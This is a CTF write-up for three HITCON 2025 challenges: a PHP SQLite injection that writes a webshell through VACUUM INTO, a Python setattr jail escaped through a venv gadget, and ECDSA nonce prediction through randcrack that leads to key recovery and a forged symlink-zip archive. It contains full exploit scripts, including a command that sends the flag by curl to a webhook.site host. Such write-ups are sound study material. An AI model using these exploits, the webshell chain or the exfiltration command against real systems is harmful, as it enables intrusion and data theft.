2025 HITCON CTF - writeup

Author : 堇姬 Naup

Note some cool challenge which i meet

Final scoreboard

Pholyglot! - 🍊

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox) or die("err?");
 
    $msg = @$_GET['msg'];
    if (isset($msg) && strlen($msg) <= 30) {
        usleep(random_int(133, 3337));

        $db = new SQLite3(".db");
        $db->exec(sprintf("
            CREATE TABLE msg (content TEXT);
            INSERT INTO msg VALUES('%s');
        ", $msg));
        $db->close();

        unlink(".db");
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    } else {
        highlight_file(__FILE__);
    }

Have one sql injection
We can use like this to RCE 

1
<?=`id`;');VACUUM+INTO('y.php

But it still use three bytes to command injection.
We can use *>a + ls let filename become command and write command to file.
And then using bash execute this file.
The last piece is to put the php webshell together and finally write it into v.php

We can get RCE and execute /read_flag
We use webshell and brute force until math problem answer is 0.

so fun~

PS: hash is md5(orangeXXX.XXX.XXX.XXX)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests

url = "http://orange.chal.hitconctf.com"

res = requests.get(f"{url}/?reset")

res = requests.get(f"{url}/?msg=');VACUUM+INTO('ls")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('o=echo")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('p=v.php")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('q=\"<?=\\`\"")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('r=\"$q\$_GET\"")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('s=[c]\\`\;")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('t=\"$r$s\";")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('u;$o $t>>$p")

res = requests.get(f"{url}/?msg=<?=`*>c`;');VACUUM+INTO('y.php")
res = requests.get(f"{url}/sandbox/c86a9c270dc45a9ed332fc5443f2e92a/y.php")
res = requests.get(f"{url}/?msg=');VACUUM+INTO('bash")
res = requests.get(f"{url}/?msg=<?=`*>a`;');VACUUM+INTO('w.php")
res = requests.get(f"{url}/sandbox/c86a9c270dc45a9ed332fc5443f2e92a/w.php")

print(res, res.text)

for i in range(10000):
    res = requests.get(f"{url}/sandbox/c86a9c270dc45a9ed332fc5443f2e92a/v.php?c=echo+0|/read_flag")
    print(res.text)
    if "hitcon" in res.text:
        print("Found hitcon! Full response:")
        print(res.text)
        break

hitcon{PHP-1s-my-b0dy-4nd-SQL-1s-my-bl00d}

simp - misc

1
2
3
4
#!/usr/local/bin/python3
while True:
    mod, attr, value = input('>>> ').split(' ')
    setattr(__import__(mod), attr, value)

We can import module and set this module’s value of a variable.

Use venv gadget
https://github.com/python/cpython/tree/3.13/Lib/venv

when you import venv.__main__
It will execute, __init__.py
If we overwrite argv, it wil create a/...
This folder have many many file, like bin/, python3.13 or etc.

And it will output some error:

When you trace context, it is sys._base_executable

If we overwrite _base_executable
First it will build a symlink point to sys._base_executable

For example:
sys._base_executable = "aaa"
/home/ctf/b/bin/aaa --> aaa

So when we set sys._base_executable = /bin/sh

this command can run a/bin/sh -m ensurepip --upgrade --default-pip
This command will call /bin/sh -m ensurepip --upgrade --default-pip

More can read source code about venv
resource

But /bin/sh will get error

Finally, We use /bin/tclsh open one tclsh shell.
But it doesn’t have stdout, so use curl to send flag on my server. 

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

io = remote("simp.chal.hitconctf.com", 48763)

io.sendlineafter(b">>> ", b"sys argv bb")
io.sendlineafter(b">>> ", b"sys _base_executable /bin/tclsh")
io.sendlineafter(b">>> ", b"venv.__main__ a a")

io.sendline(b"exec curl -s \"https://webhook.site/40139958-9e77-41db-a911-21fab41e2930/[exec cat /home/ctf/flag | base64]\"")

io.interactive()

hitcon{__import__(“chalenge”).solved=true}

Simple driver and revenge - crypto

We found that cookie is generated by random.randbytes(32) and same does ecdsa signature nonce k

1
2
def gen():
    return base64.b64encode(random.randbytes(32)).decode().rstrip('=')
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def sign(self, m):
        e = self.hash(m)
        z = e & ((1 << self.c.l) - 1)
        while True:
            k = random.randint(1, self.c.n - 1)
            print(self.key, flush=True)
            p = k * self.c.g
            r = p.x % self.c.n
            if r == 0:
                continue
            s = pow(k, -1, self.c.n) * (z + r * self.key) % self.c.n
            if s != 0:
                break
        print(r, s, k, e, self.c.n, flush=True)
        return (r, s)

We need 78 × 32 bytes (624 × 32 bits) to restore the random state, , but we can obtain at most 50 cookies.

So we can wait 60 seconds, and the cookies will expire.

1
2
3
4
def __init__(self, user):
    self.user = user
    self.exp = time.time() + 60
    self.id = Cookie.gen()

Then we can request the auth_router with the expired cookies, and the server will delete them.

So we can request new 28 cookies.

Use cookie get continuous random numbers, and we can use randcrack predict k

We can use /backup get r,s.
And use hash get z.
We will use r,s,k,z restore d

We can use symlink (link to /flag) and zip.
And use d sign new signature.
When we call /restore and try to read flag.
We can get flag. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
import requests
import struct
from urllib.parse import urlencode

BASE_URL = "http://127.0.0.1:5487" # change it to the instance

# ---- 基礎 request function ----
def request_get(path, params=None, cookie=None):
    return requests.get(BASE_URL + path, params=params, cookies=cookie)

def request_post(path, data=None, params=None, cookie=None):
    return requests.post(BASE_URL + path, data=data, params=params, cookies=cookie)

# ---- status code printer ----
def print_status(route_name, code):
    print(f"{route_name}: {code}")

# ---- Auth / User ----
def register(username, password):
    res = request_post("/register", data={"username": username, "password": password})
    print_status("register", res.status_code)
    return res.text

def login(username, password):
    res = request_post("/login", data={"username": username, "password": password})
    print_status("login", res.status_code)
    cookie = None
    if res.status_code == 200:
        cookie = {"hitconctf": res.headers.get("Set-Cookie").split('=')[1].split(';')[0]}
    return cookie

def logout(cookie):
    res = request_post("/logout", cookie=cookie)
    print_status("logout", res.status_code)
    return res.text

# ---- File / FS ----
def upload(path, content, cookie):
    res = request_post("/upload", params={"path": path}, data=content, cookie=cookie)
    print_status("upload", res.status_code)
    return res.text

def mkdir(path, cookie):
    res = request_post("/mkdir", params={"path": path}, cookie=cookie)
    print_status("mkdir", res.status_code)
    return res.text

def rm(path, cookie):
    res = request_post("/rm", params={"path": path}, cookie=cookie)
    print_status("rm", res.status_code)
    return res.text

def read(path, cookie):
    res = request_get("/read", params={"path": path}, cookie=cookie)
    print_status("read", res.status_code)
    return res.content

def listdir(path, cookie):
    res = request_get("/listdir", params={"path": path}, cookie=cookie)
    print_status("listdir", res.status_code)
    return res.text

def download(path, cookie):
    res = request_get("/download", params={"path": path}, cookie=cookie)
    print_status("download", res.status_code)
    return res.content

def backup(cookie):
    res = request_get("/backup", cookie=cookie)
    print_status("backup", res.status_code)
    return res.content

def restore(data, cookie):
    res = request_post("/restore", data=data, cookie=cookie)
    print_status("restore", res.status_code)
    return res.text

def verify(data, cookie):
    res = request_post("/verify", data=data, cookie=cookie)
    print_status("verify", res.status_code)
    return res.text

# ---- Archive ----
def get_pubkey():
    res = request_get("/pubkey")
    print_status("pubkey", res.status_code)
    return res.text

def get_hash(data, cookie):
    res = request_get("/hash", params=data, cookie=cookie)
    print_status("hash", res.status_code)
    return res.text

def get_salt(data, pow_str, cookie):
    res = request_get("/salt", params={"pow": pow_str}, data=data, cookie=cookie)
    print_status("salt", res.status_code)
    return res.text

import struct
import uuid

def parse_backup_structured(backup_bytes):
    """
    將 Archive bytes 解析成 dict:
    {
        'header': {
            'signature': int,
            'archive_id': UUID,
            'timestamp': float,
            'user_id': UUID,
            'crc': int
        },
        'zip_data': bytes,
        'footer': {
            'r': int,
            's': int
        }
    }
    """
    HEADER = struct.Struct('<I16sd16sI')
    FOOTER = struct.Struct('<32s32s')

    if len(backup_bytes) < HEADER.size + FOOTER.size:
        raise ValueError("Backup bytes too短")

    # header
    header_bytes = backup_bytes[:HEADER.size]
    signature, aid, ts, uid, crc = HEADER.unpack(header_bytes)
    header = {
        'signature': signature,
        'archive_id': uuid.UUID(bytes=aid),
        'timestamp': ts,
        'user_id': uuid.UUID(bytes=uid),
        'crc': crc
    }

    # footer
    footer_bytes = backup_bytes[-FOOTER.size:]
    r_bytes, s_bytes = FOOTER.unpack(footer_bytes)
    footer = {
        'r': int.from_bytes(r_bytes, 'big'),
        's': int.from_bytes(s_bytes, 'big')
    }

    # zip data
    zip_data = backup_bytes[HEADER.size:-FOOTER.size]

    return {
        'header': header,
        'zip_data': zip_data,
        'footer': footer
    }

from base64 import b64encode, b64decode
from randcrack import RandCrack
from time import sleep
from Crypto.Util.number import *
import hashlib


        
def get_bytes_from_cookie(cookie):
    data = cookie['hitconctf']
    b64_data = data.ljust(len(data) + 4 - (len(data) % 4), '=')
    return b64decode(b64_data)

def hash(m):
    return int.from_bytes(hashlib.sha256(m).digest(), 'little')

def recover_privkey_from_rs_k(r: int, s: int, k: int, z: int, n: int) -> int:
    """
    r, s, k, z, n are integers (mod n)
    returns d such that s = k^{-1}(z + r*d) (mod n)
    """
    if r % n == 0:
        raise ValueError("r == 0 (mod n), inverse does not exist")
    # compute (s*k - z) mod n
    numerator = (s * k - z) % n
    r_inv = pow(r, -1, n)  # modular inverse of r mod n
    d = (numerator * r_inv) % n
    return d

register('aaa', 'aaa')


cookies = [login('aaa', 'aaa') for _ in range(50)]
cookie_bytes = [get_bytes_from_cookie(cookie) for cookie in cookies]
sleep(60)
for cookie in cookies:
    listdir('/', cookie)


cookies = [login('aaa', 'aaa') for _ in range(28)]
cookie_bytes += [get_bytes_from_cookie(cookie) for cookie in cookies]

RC = RandCrack()

for x in cookie_bytes:
    chunks = [x[i:i+4] for i in range(0, 32, 4)]
    for chunk in chunks:
        num = int.from_bytes(chunk, 'little')
        RC.submit(num)

upload('hello', b'hello', cookies[-1])

backup_file = backup(cookies[-1])
parsed_backup = parse_backup_structured(backup_file)

print(backup_file)

n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
k = RC.predict_randint(1, n)
r = parsed_backup['footer']['r']
s = parsed_backup['footer']['s']
FOOTER = struct.Struct('<32s32s')


def get_hash(data, cookie):
    res = requests.get(
        BASE_URL + "/hash",
        data=data,  # 用 data 傳 bytes
        cookies=cookie
    )
    print("hash status:", res.status_code)
    return res.content  

z = int(get_hash(backup_file, cookies[-1]))
d = recover_privkey_from_rs_k(r, s, k, z, n)


print(r, s, k, z, n)
print(d)

import io, zipfile, time, binascii, secrets 

def make_symlink_zip(link_name="x", target="/flag"):
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w") as zf:
        zi = zipfile.ZipInfo(link_name)
        zi.create_system = 3                 
        zi.external_attr = (0o120777 << 16)
        zf.writestr(zi, target)
    return bio.getvalue()

evil_zip = make_symlink_zip("x", "/flag")

MAGIC = 0xa075c93f
HDR = struct.Struct('<I16sd16sI')
FTR = struct.Struct('<32s32s')

def build_archive(aid_bytes, uid_bytes, ts, zip_bytes, r, s):
    crc = binascii.crc32(zip_bytes) & 0xFFFFFFFF
    header = HDR.pack(MAGIC, aid_bytes, ts, uid_bytes, crc)
    footer = FTR.pack(r.to_bytes(32, 'big'), s.to_bytes(32, 'big'))
    return header + zip_bytes + footer

aid_bytes = parsed_backup['header']['archive_id'].bytes
uid_bytes = parsed_backup['header']['user_id'].bytes
ts = parsed_backup['header']['timestamp']

unsigned = build_archive(aid_bytes, uid_bytes, ts, evil_zip, 0, 0)
dummy_archive_for_hash = unsigned[:-FTR.size] + (b"\x00" * FTR.size)

e2 = int(get_hash(dummy_archive_for_hash, cookies[-1]))

P  = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
A  = 0
N  = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
Gx = 55066263022277343669578718895168534326250603453777594175500187360389116729240
Gy = 32670510020758816978083085130507043184471273380659243275938904335757337482424

def inv_mod(a, n): return pow(a, -1, n)

class ECPoint:
    __slots__=("x","y","inf")
    def __init__(self,x=None,y=None,inf=False): self.x,self.y,self.inf=x,y,inf
    def copy(self): return ECPoint(self.x,self.y,self.inf)

def ec_add(p, q):
    if p.inf: return q.copy()
    if q.inf: return p.copy()
    Pmod = P
    if p.x == q.x and (p.y != q.y or p.y == 0): return ECPoint(inf=True)
    if p.x == q.x:
        m = (3*p.x*p.x + A) * inv_mod(2*p.y % Pmod, Pmod) % Pmod
    else:
        m = (q.y - p.y) * inv_mod((q.x - p.x) % Pmod, Pmod) % Pmod
    rx = (m*m - p.x - q.x) % Pmod
    ry = (m*(p.x - rx) - p.y) % Pmod
    return ECPoint(rx, ry, inf=False)

def ec_mul(k, px, py):
    res = ECPoint(inf=True)
    add = ECPoint(px, py, inf=False)
    while k:
        if k & 1: res = ec_add(res, add)
        add = ec_add(add, add)
        k >>= 1
    return res

def ecdsa_sign(e, d):
    while True:
        k = secrets.randbelow(N-1) + 1
        R = ec_mul(k, Gx, Gy)
        r = R.x % N
        if r == 0: 
            continue
        s = (inv_mod(k, N) * (e + r*d)) % N
        if s == 0:
            continue
        return r, s

r2, s2 = ecdsa_sign(e2, d)

forged = build_archive(aid_bytes, uid_bytes, ts, evil_zip, r2, s2)

print_status("verify forged", verify(forged, cookies[-1]))
print_status("restore forged", restore(forged, cookies[-1]))
flag_bytes = read("x", cookies[-1])
print("\n=== FLAG ===\n", flag_bytes.decode(errors="ignore"))

after all

So fun~